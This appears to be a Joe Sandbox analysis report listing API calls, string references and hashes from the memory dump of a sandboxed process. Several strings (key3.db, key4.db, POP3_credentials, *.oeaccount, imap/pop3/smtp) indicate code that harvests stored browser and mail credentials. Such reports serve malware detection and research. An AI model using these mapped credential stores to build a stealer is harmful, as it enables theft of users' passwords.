                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                          • String ID: C@$key3.db$key4.db
                                                                                                                                                                                          • API String ID: 581844971-2841947474
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2126104762-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                          • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                          • API String ID: 1631269929-4153097237
                                                                                                                                                                                          • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                          • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                          • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • strings, xrefs: 00408B98
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                          • API String ID: 4036804644-4125592482
                                                                                                                                                                                          • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                          • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,769CE430,?), ref: 00407F2F
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                          • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                          • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                          • API String ID: 1886237854-2881260426
                                                                                                                                                                                          • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00408F5D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                            • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                            • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                            • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unknown error, xrefs: 00426E65
                                                                                                                                                                                          • cannot release savepoint - SQL statements in progress, xrefs: 004260EE
                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 00427E1B
                                                                                                                                                                                          • no such savepoint: %s, xrefs: 004260D0
                                                                                                                                                                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426002
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                          • API String ID: 3510742995-3035234601
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                            • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemcpy
                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                          • API String ID: 1784268899-4153596280
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                            • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3974772901-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                          • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 577244452-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
